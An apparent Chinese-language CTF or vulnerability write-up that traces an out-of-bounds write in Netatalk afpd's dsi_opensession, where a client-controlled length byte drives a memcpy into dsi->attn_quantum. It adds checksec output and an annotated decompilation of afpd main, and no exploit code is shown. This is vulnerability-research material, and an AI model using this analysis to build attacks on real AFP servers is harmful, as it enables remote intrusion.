&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* Close IPC fd here and mark it as unused
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*/
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;close(child->afpch_ipc_fd);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;child->afpch_ipc_fd=-1;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* Being unfriendly here, but we really
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* want to get rid of it. The 'child'
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* handle gets cleaned up in the SIGCLD
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* handler.
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*/
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;kill(child->afpch_pid,&nbsp;SIGKILL);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;
…………

对于这个段代码在!(init_listening_sockets(&obj))里开始进行监控套接字，下面的while (1)循环就是对消息不断地进行处理，同时(child = dsi_start(&obj, (DSI *)(asev->data[i].private), server_children))这行代码返回了进程描述符，这里面就开始已经真正开始接收和处理请求了，那么接着阅读这个函数

同时他也调用了这个函数

 staticafp_child_t*dsi_start(AFPObj*obj, DSI*dsi,
                              server_child_t*server_children)
{
    afp_child_t*child=NULL;

    if (dsi_getsession(dsi, server_children, obj->options.tickleval, &child) !=0) {
        LOG(log_error, logtype_afpd, "dsi_start: session error: %s", strerror(errno));
        returnNULL;
    }

    /* we've forked. */
    if (child==NULL) {
        configfree(obj, dsi);
        afp_over_dsi(obj); /* start a session */
        exit(0);
    }

    returnchild;
 }

而这个函数就是我们调用的一个函数体而我们在掉了这个函数体后又调用getsession的一个调用

 intdsi_getsession(DSI*dsi, server_child_t*serv_children, inttickleval,
                   afp_child_t**childp)
{
    pid_tpid;
    intipc_fds[2];
    afp_child_t*child;

&nbsp; &nbsp;&nbsp;if&nbsp;(socketpair(PF_UNIX,&nbsp;SOCK_STREAM,&nbsp;0,&nbsp;ipc_fds)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_dsi,&nbsp;"dsi_getsess: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return-1;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;if&nbsp;(setnonblock(ipc_fds[0],&nbsp;1)&nbsp;!=0||setnonblock(ipc_fds[1],&nbsp;1)&nbsp;!=0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_dsi,&nbsp;"dsi_getsess: setnonblock: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return-1;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;switch&nbsp;(pid=dsi->proto_open(dsi)) {&nbsp;/* in libatalk/dsi/dsi_tcp.c */
&nbsp; &nbsp;&nbsp;case-1:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* if we fail, just return. it might work later */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_dsi,&nbsp;"dsi_getsess: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return-1;

&nbsp; &nbsp;&nbsp;case0:&nbsp;/* child. mostly handled below. */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;

&nbsp; &nbsp;&nbsp;default:&nbsp;/* parent */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* using SIGKILL is hokey, but the child might not have
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* re-established its signal handler for SIGTERM yet. */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;close(ipc_fds[1]);

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;((child=server_child_add(serv_children,&nbsp;pid,&nbsp;ipc_fds[0]))&nbsp;==&nbsp;&nbsp;NULL) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_dsi,&nbsp;"dsi_getsess: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;close(ipc_fds[0]);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi->header.dsi_flags=DSIFL_REPLY;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi->header.dsi_data.dsi_code=htonl(DSIERR_SERVBUSY);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi_send(dsi);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi->header.dsi_data.dsi_code=DSIERR_OK;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;kill(pid,&nbsp;SIGKILL);
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi->proto_close(dsi);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;*childp=child;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return0;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;/* Save number of existing and maximum connections */
&nbsp; &nbsp;&nbsp;dsi->AFPobj->cnx_cnt=serv_children->servch_count;
&nbsp; &nbsp;&nbsp;dsi->AFPobj->cnx_max=serv_children->servch_nsessions;
&nbsp; &nbsp;&nbsp;/* get rid of some stuff */
&nbsp; &nbsp;&nbsp;dsi->AFPobj->ipc_fd=ipc_fds[1];
&nbsp; &nbsp;&nbsp;close(ipc_fds[0]);
&nbsp; &nbsp;&nbsp;close(dsi->serversock);
&nbsp; &nbsp;&nbsp;dsi->serversock=-1;
&nbsp; &nbsp;&nbsp;server_child_free(serv_children);

&nbsp; &nbsp;&nbsp;switch&nbsp;(dsi->header.dsi_command) {
&nbsp; &nbsp;&nbsp;caseDSIFUNC_STAT: {&nbsp;/* send off status and return */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* OpenTransport 1.1.2 bug workaround:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* OT code doesn't currently handle close sockets well. urk.
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* the workaround: wait for the client to close its
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* side. timeouts prevent indefinite resource use.
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*/
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;staticstructtimevaltimeout=&nbsp;{120,&nbsp;0};
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;fd_setreadfds;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi_getstatus(dsi);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;FD_ZERO(&readfds);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;FD_SET(dsi->socket,&nbsp;&readfds);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;free(dsi);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;select(FD_SETSIZE,&nbsp;&readfds,&nbsp;NULL,&nbsp;NULL,&nbsp;&timeout);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(0);
&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;break;

&nbsp; &nbsp;&nbsp;caseDSIFUNC_OPEN:&nbsp;/* setup session */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* set up the tickle timer */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi->timer.it_interval.tv_sec=dsi->timer.it_value.tv_sec=tickleval;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi->timer.it_interval.tv_usec=dsi->timer.it_value.tv_usec=0;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi_opensession(dsi);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;*childp=NULL;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return0;

&nbsp; &nbsp;&nbsp;default:&nbsp;/* just close */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_info,&nbsp;logtype_dsi,&nbsp;"DSIUnknown %d",&nbsp;dsi->header.dsi_command);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi->proto_close(dsi);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(EXITERR_CLNT);
&nbsp; &nbsp; }
&nbsp;}

同时我们在这里遭到dsi_opensession的一个函数而这个cve也是在这个位置上获得的要给漏洞权限

 voiddsi_opensession(DSI*dsi)
{
    size_ti=0;
    uint32_tservquant;
    uint32_treplcsize;
    intoffs;
    uint8_tcmd;
    size_toption_len;

&nbsp; &nbsp;&nbsp;if&nbsp;(setnonblock(dsi->socket,&nbsp;1)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_dsi,&nbsp;"dsi_opensession: setnonblock: %s",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;AFP_PANIC("setnonblock error");
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;/* parse options */
&nbsp; &nbsp;&nbsp;while&nbsp;(i+1<dsi->cmdlen) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;cmd=dsi->commands[i++];
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;option_len=dsi->commands[i++];

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(i+option_len>dsi->cmdlen) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_dsi,&nbsp;"option %"PRIu8" too large: %zu",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;cmd,&nbsp;option_len);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(EXITERR_CLNT);
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;switch&nbsp;(cmd) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;caseDSIOPT_ATTNQUANT:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(option_len!=sizeof(dsi->attn_quantum)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_dsi,&nbsp;"option %"PRIu8" bad length: %zu",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;cmd,&nbsp;option_len);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(EXITERR_CLNT);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;memcpy(&dsi->attn_quantum,&nbsp;dsi->commands+i+1,&nbsp;dsi->commands[i]);//而这里就是我们漏洞发生的一个位置
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dsi->attn_quantum=ntohl(dsi->attn_quantum);

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;caseDSIOPT_SERVQUANT:

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* just ignore these */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;default:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;i+=option_len;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;/* let the client know the server quantum. we don't use the
&nbsp; &nbsp; &nbsp;* max server quantum due to a bug in appleshare client 3.8.6. */
&nbsp; &nbsp;&nbsp;dsi->header.dsi_flags=DSIFL_REPLY;
&nbsp; &nbsp;&nbsp;dsi->header.dsi_data.dsi_code=0;
#if&nbsp;0
&nbsp; &nbsp;&nbsp;dsi->header.dsi_command=DSIFUNC_OPEN;
#endif
&nbsp; &nbsp;&nbsp;/* length of data. dsi_send uses it. */
&nbsp; &nbsp;&nbsp;dsi->cmdlen=2*&nbsp;(2+sizeof(uint32_t));
&nbsp; &nbsp;&nbsp;/* DSI Option Server Request Quantum */
&nbsp; &nbsp;&nbsp;dsi->commands[0]&nbsp;=DSIOPT_SERVQUANT;
&nbsp; &nbsp;&nbsp;dsi->commands[1]&nbsp;=sizeof(servquant);
&nbsp; &nbsp;&nbsp;servquant=htonl((dsi->server_quantum<DSI_SERVQUANT_MIN||
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;dsi->server_quantum>DSI_SERVQUANT_MAX)&nbsp;?
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;DSI_SERVQUANT_DEF&nbsp;:&nbsp;dsi->server_quantum);
&nbsp; &nbsp;&nbsp;memcpy(dsi->commands+2,&nbsp;&servquant,&nbsp;sizeof(servquant));
&nbsp; &nbsp;&nbsp;/* AFP replaycache size option */
&nbsp; &nbsp;&nbsp;offs=2+sizeof(replcsize);
&nbsp; &nbsp;&nbsp;dsi->commands[offs]&nbsp;=DSIOPT_REPLCSIZE;
&nbsp; &nbsp;&nbsp;dsi->commands[offs+1]&nbsp;=sizeof(replcsize);
&nbsp; &nbsp;&nbsp;replcsize=htonl(REPLAYCACHE_SIZE);
&nbsp; &nbsp;&nbsp;memcpy(dsi->commands+offs+2,&nbsp;&replcsize,&nbsp;sizeof(replcsize));
&nbsp; &nbsp;&nbsp;dsi_send(dsi);
&nbsp;}

这句话是向dsi->attn_quantum这里面写入dsi->commands + i + 1，写dsi->commands[i]写这个的大小，那么需要先要去了解一下dsi结构体

 typedefstructDSI {
&nbsp; &nbsp;&nbsp;structDSI*next; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 链表指针，用于维护多个监听地址或会话 */
&nbsp; &nbsp;&nbsp;AFPObj&nbsp; &nbsp;*AFPobj; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 指向 AFP 会话对象，DSI 是 AFP 的传输层 */
&nbsp; &nbsp;&nbsp;int&nbsp; &nbsp; &nbsp;&nbsp;statuslen; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 状态字符串长度 */
&nbsp; &nbsp;&nbsp;char&nbsp; &nbsp; &nbsp;status[1400]; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 状态信息缓冲区，最大 1400 字节 */
&nbsp; &nbsp;&nbsp;char&nbsp; &nbsp; &nbsp;*signature; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 会话签名，用于认证或唯一标识 */
&nbsp; &nbsp;&nbsp;structdsi_blockheader; &nbsp; &nbsp; &nbsp;/*!< DSI 协议头部结构 */
&nbsp; &nbsp;&nbsp;structsockaddr_storageserver,&nbsp;client;&nbsp;/*!< 服务端和客户端的 socket 地址，支持 IPv4/IPv6 */
&nbsp; &nbsp;&nbsp;structitimervaltimer; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 定时器，用于超时或心跳检测 */
&nbsp; &nbsp;&nbsp;int&nbsp; &nbsp; &nbsp;&nbsp;tickle; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< tickle 计数器，AFP/DSI 心跳包保持连接 */
&nbsp; &nbsp;&nbsp;int&nbsp; &nbsp; &nbsp;&nbsp;in_write; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 是否正在写多个数据包，避免信号处理器同时写 socket */
&nbsp; &nbsp;&nbsp;int&nbsp; &nbsp; &nbsp;&nbsp;msg_request; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 是否有待发送的消息请求 */
&nbsp; &nbsp;&nbsp;int&nbsp; &nbsp; &nbsp;&nbsp;down_request; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 是否有待处理的 SIGUSR1 下线请求（5分钟后） */

&nbsp; &nbsp;&nbsp;uint32_tattn_quantum; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 注意量子，协议参数 */
&nbsp; &nbsp;&nbsp;uint32_tdatasize; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 数据大小，协议参数 */
&nbsp; &nbsp;&nbsp;uint32_tserver_quantum; &nbsp; &nbsp; &nbsp;/*!< 服务端量子，协议参数 */
&nbsp; &nbsp;&nbsp;uint16_tserverID; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 服务端 ID */
&nbsp; &nbsp;&nbsp;uint16_tclientID; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 客户端 ID */
&nbsp; &nbsp;&nbsp;uint8_t&nbsp;&nbsp;*commands; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< DSI 接收缓冲区 */
&nbsp; &nbsp;&nbsp;uint8_t&nbsp;&nbsp;data[DSI_DATASIZ]; &nbsp;&nbsp;/*!< DSI 回复缓冲区 */
&nbsp; &nbsp;&nbsp;size_t&nbsp; &nbsp;datalen; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 数据长度 */
&nbsp; &nbsp;&nbsp;size_t&nbsp; &nbsp;cmdlen; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 命令长度 */
&nbsp; &nbsp;&nbsp;off_t&nbsp; &nbsp;&nbsp;read_count; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 已读取字节统计 */
&nbsp; &nbsp;&nbsp;off_t&nbsp; &nbsp;&nbsp;write_count; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 已写入字节统计 */
&nbsp; &nbsp;&nbsp;uint32_tflags; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 会话标志位，如 DSI_SLEEPING, DSI_DISCONNECTED */
&nbsp; &nbsp;&nbsp;int&nbsp; &nbsp; &nbsp;&nbsp;socket; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< AFP 会话 socket */
&nbsp; &nbsp;&nbsp;int&nbsp; &nbsp; &nbsp;&nbsp;serversock; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 监听 socket */

&nbsp; &nbsp;&nbsp;/* DSI 预读缓冲区，用于 dsi_peek 中的缓冲读取 */
&nbsp; &nbsp;&nbsp;size_t&nbsp; &nbsp;dsireadbuf; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 预读缓冲区大小 */
&nbsp; &nbsp;&nbsp;char&nbsp; &nbsp; &nbsp;*buffer; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/*!< 缓冲区起始位置 */
&nbsp; &nbsp;&nbsp;char&nbsp; &nbsp; &nbsp;*start; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 当前缓冲区头 */
&nbsp; &nbsp;&nbsp;char&nbsp; &nbsp; &nbsp;*eof; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 当前已使用缓冲区的末尾 */
&nbsp; &nbsp;&nbsp;char&nbsp; &nbsp; &nbsp;*end; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/*!< 缓冲区末尾 */
}&nbsp;DSI;

这个就是他的一个结构体在这个结构体中我们可以知道我们，我们的commands这个结构大小是一个固定值，是一个uint8_t的一个大小的数据那么只要可以控制dsi->commands[i]的值就可以控制&dsi->attn_quantum往后写多少而最多啊就是可以写255这么多的一个数据那么就是触发了要给越界写，因此我们进行一个赋值

在进入到dsi_opensession函数之前，会隐式的调用dsi_stream_receive函数，

dsi_stream_receive这个函数的作用就是填充dsi结构体，阅读dsi_stream_receive

 intdsi_stream_receive(DSI*dsi)
{
  charblock[DSI_BLOCKSIZ];

  LOG(log_maxdebug, logtype_dsi, "dsi_stream_receive: START");

  if (dsi->flags&DSI_DISCONNECTED)
      return0;

  /* read in the header */
  if (dsi_buffered_stream_read(dsi, (uint8_t*)block, sizeof(block)) !=sizeof(block))    //////////////这部分相当于读取你的输入里面不处理任何赋值 dsi->socket里面存储的网络地址输入过来的信息
    return0;

  dsi->header.dsi_flags=block[0];
  dsi->header.dsi_command=block[1];

  if (dsi->header.dsi_command==0)
      return0;

  memcpy(&dsi->header.dsi_requestID, block+2, sizeof(dsi->header.dsi_requestID));
  memcpy(&dsi->header.dsi_data.dsi_doff, block+4, sizeof(dsi->header.dsi_data.dsi_doff));
  dsi->header.dsi_data.dsi_doff=htonl(dsi->header.dsi_data.dsi_doff);
  memcpy(&dsi->header.dsi_len, block+8, sizeof(dsi->header.dsi_len));

  memcpy(&dsi->header.dsi_reserved, block+12, sizeof(dsi->header.dsi_reserved));
  dsi->clientID=ntohs(dsi->header.dsi_requestID);

  /* make sure we don't over-write our buffers. */
  dsi->cmdlen=MIN(ntohl(dsi->header.dsi_len), dsi->server_quantum);

  /* Receiving DSIWrite data is done in AFP function, not here */
  if (dsi->header.dsi_data.dsi_doff) {
      LOG(log_maxdebug, logtype_dsi, "dsi_stream_receive: write request");
      dsi->cmdlen=dsi->header.dsi_data.dsi_doff;
  }

  if (dsi_stream_read(dsi, dsi->commands, dsi->cmdlen) !=dsi->cmdlen)  //////////////////////////////////////
    return0;

  LOG(log_debug, logtype_dsi, "dsi_stream_receive: DSI cmdlen: %zd", dsi->cmdlen);

  returnblock[1];
 }

对于蓝色部分存储到了block[]中然后再赋值到dsi.header变量中，红色部分通过dsi_stream_read(dsi, dsi->commands, dsi->cmdlen) != dsi->cmdlen这个函数将payload字段放到了你的dsi->commond中，至此了解该函数是如何把DSI流量数据填充进 dsi structure

因此这里就出现了任意的一个地址写，所以这个是他漏洞形成的一个原因

而这个题目的手法也就是这个

 (pwn) secreu@Vanilla:~/netatalk$checksec--file=afpd
[*] '/home/secreu/netatalk/afpd'
    Arch:       amd64-64-little
    RELRO:      FullRELRO
    Stack:      Canaryfound
    NX:         NXenabled
    PIE:        PIEenabled
    FORTIFY:    Enabled
(pwn) secreu@Vanilla:~/netatalk$checksec--file=libc-2.27.so
[*] '/home/secreu/netatalk/libc-2.27.so'
    Arch:       amd64-64-little
    RELRO:      PartialRELRO
    Stack:      Canaryfound
    NX:         NXenabled
    PIE:        PIEenabled
(pwn) secreu@Vanilla:~/netatalk$checksec--file=libatalk.so.18
[*] '/home/secreu/netatalk/libatalk.so.18'
    Arch:       amd64-64-little
    RELRO:      PartialRELRO
    Stack:      Canaryfound
    NX:         NXenabled
    PIE:        PIEenabled
    FORTIFY:    Enabled

 /**
* afpd 守护进程主函数 —— 逐行中文注释版
*
* afpd (Apple Filing Protocol Daemon) 是 Netatalk 项目的核心组件，
* 负责在 Linux/Unix 系统上提供苹果文件共享服务（AFP协议）。
*
* 本文件为 IDA Pro 反编译输出，经过人工注释整理。
*/

int__fastcallmain(intargc, constchar**argv, constchar**envp)
{
  /* ══════════════════════════════════════════════
   * 局部变量声明区（均为反编译器自动命名）
   * ══════════════════════════════════════════════ */
  __int64v3;               // 临时变量，用于传递信号处理标志
  __int64v4;               // 临时变量（socket初始化日志参数）
  intv5;                   // getrlimit64() 的返回值
  int*v6;                  // errno 指针（临时）
  int*v7;                  // errno 指针（长期持有，主循环中使用）
  __int64i;                // 主循环迭代变量，指向事件循环结构
  intv9;                   // poll() 的返回值（就绪fd数量）
  intv10;                  // 保存的 errno 值
  __int64v11;              // poll fd 数组遍历索引
  __int64v12;              // 事件循环结构指针（内层循环）
  __int64v13;              // DSI会话结构指针
  __int64v14;              // 事件槽结构指针
  char*v15;                // strerror() 返回的错误字符串
  constchar*v16;          // 日志格式字符串
  char*v17;                // 日志参数字符串
  __int64v18;              // 日志行号
  __int64v19;              // 服务器链表遍历指针
  __int64v20;              // 临时（socket handler日志参数）
  __int64v21;              // server_child 结构指针（临时）
  unsignedintv22;         // waitpid() 返回的子进程PID
  unsignedintv23;         // server_child_remove() 返回的fd
  constchar*v24;          // 子进程退出日志格式字符串
  __int64v25;              // 子进程退出日志参数（pid）
  __int64v26;              // 子进程退出日志行号
  char*v27;                // strerror() 返回值（poll错误）
  _DWORD*v29;              // 子进程数据结构指针
  intv30;                  // ipc_server_read() 返回值
  intv31;                  // IPC fd（日志参数）
  charv32;                 // asev_add_fd() 返回值
  __pid_t*v33;             // 子进程结构指针（kill操作）
  __pid_tv34;              // 要被kill的子进程PID
  char*v35;                // strerror()（DSI会话错误）
  char*v36;                // strerror()（getrlimit错误）
  constchar*v37;          // 错误日志字符串
  __int64v38;              // 错误日志行号
  int*v39, *v44, *v46, *v48, *v50, *v52, *v54, *v56; // errno 指针（各sigaction错误处理）
  char*v40, *v45, *v47, *v49, *v51, *v53, *v55, *v57; // strerror() 返回值（各信号错误）
  constchar*v41;          // 错误日志格式（通用）
  char*v42;                // 错误日志参数（通用）
  __int64v43;              // 错误日志行号（通用）

  rlim64_trlim_cur;        // 保存新建子进程的结构地址（复用栈空间）
  __pid_t*v59;             // 子进程结构指针（复用栈空间，与rlim_cur同地址）
  structrlimit64rlimits;  // 文件描述符资源限制结构（也复用为waitpid状态）
  sigset_tset;             // 信号集，用于 pthread_sigmask 操作
  structsigactionact;     // 信号处理动作结构
  unsigned__int64v63;     // Stack canary（栈溢出保护）

  /* ══════════════════════════════════════════════
   * 一、栈保护 & 启动初始化
   * ══════════════════════════════════════════════ */

  // 读取 fs:0x28 处的 stack canary 值，存入局部变量，函数返回时校验
  v63=__readfsqword(0x28u);

  // 解析命令行参数，结果写入全局配置结构 unk_25C5C0
  afp_options_parse_cmdline(&unk_25C5C0, (unsignedint)argc, argv);

  // 如果没有传入 -F（前台运行）标志，则调用 daemonize() 转入后台
  // daemonize() 失败（返回非0）则跳转到 LABEL_96 → exit(3)
  if ( (byte_25C5C8&1) ==0&& (unsignedint)daemonize(0, 0) )
    gotoLABEL_96;

  // 设置故障处理（通常注册 SIGSEGV/SIGBUS 等崩溃信号的调试处理器）
  fault_setup(0);

  // 解析 afpd 配置文件（如 /etc/afp.conf）
  // 失败则跳转 LABEL_44 → exit(2)
  if ( (unsignedint)afp_config_parse(&unk_25C5C0, "afpd") )
    gotoLABEL_44;

  // 设置 umask，并保存旧值到全局变量 dword_25C704，
  // 用于后续 fork 子进程时恢复文件权限掩码
  dword_25C704=umask(mask);

  // 分配子进程管理结构（用于追踪所有 AFP 客户端子进程）
  // dword_25C5E0 为最大子进程数（来自配置）
  qword_25C5B8=server_child_alloc((unsignedint)dword_25C5E0);
  if ( !qword_25C5B8 )
  {
    // 分配失败：若日志级别 > 1，打印错误后退出
    if ( (unsignedint)dword_245298>1 )
    {
      v54=__errno_location();     // 获取 errno 地址
